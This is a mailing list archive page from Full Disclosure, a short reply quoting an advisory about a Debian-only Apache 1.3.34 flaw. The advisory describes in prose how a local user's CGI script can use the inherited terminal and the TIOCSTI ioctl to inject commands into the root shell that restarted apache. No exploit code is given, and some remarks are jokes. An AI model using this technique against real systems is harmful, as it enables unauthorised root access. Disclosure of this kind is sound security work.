Full Disclosure mailing list archives

Re: Local user to root escalation in apache 1.3.34 (Debian only)

From: "Nikolay Kichukov" <hijacker () oldum net>
Date: Mon, 26 Feb 2007 21:15:48 +0200 (EET)

Lool,
how long has this bug been around?

Sounds scary.

-nik

On Mon, February 26, 2007 8:11 pm, Richard Thrippleton wrote:

Version 1.3.34-4 of Apache in the Debian Linux distribution contains a
hole that allows a local user to access a root shell if the webserver has
been restarted manually. This bug does not exist in the upstream apache
distribution, and was patched in specifically by the Debian distribution.
The
bug report is located at
http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=357561 . At the time of
writing (over a month since the root hole was clarified), there has been
no official acknowledgement. It is believed that most of the developers
are tied up in more urgent work, getting the TI-86 distribution of Debian
building in time for release.

Unlike every other daemon, apache does not abdicate its controlling tty
on startup, and allows it to be inherited by a cgi script (for example, a
local user's CGI executed using suexec). When apache is manually
restarted, the inherited ctty is the stdin of the (presumably root) shell
that invoked the new instance of apache. Any process is permitted to
invoke the TIOCSTI ioctl on the fd corresponding to its ctty, which allows
it to inject characters that appear to come from the terminal master.
Thus, a user created CGI script can inject
and have executed any input into the shell that spawned apache.

As a Debian user, this concerns me greatly, as any non-privileged user
would be able to install non-free documentation (GFDL) on any system I
run.

Richard


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/



_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Current thread:

Local user to root escalation in apache 1.3.34 (Debian only) Richard Thrippleton (Feb 26)
- Re: Local user to root escalation in apache 1.3.34 (Debian only) Nikolay Kichukov (Feb 26)
  - Re: Local user to root escalation in apache 1.3.34 (Debian only) Richard Thrippleton (Feb 26)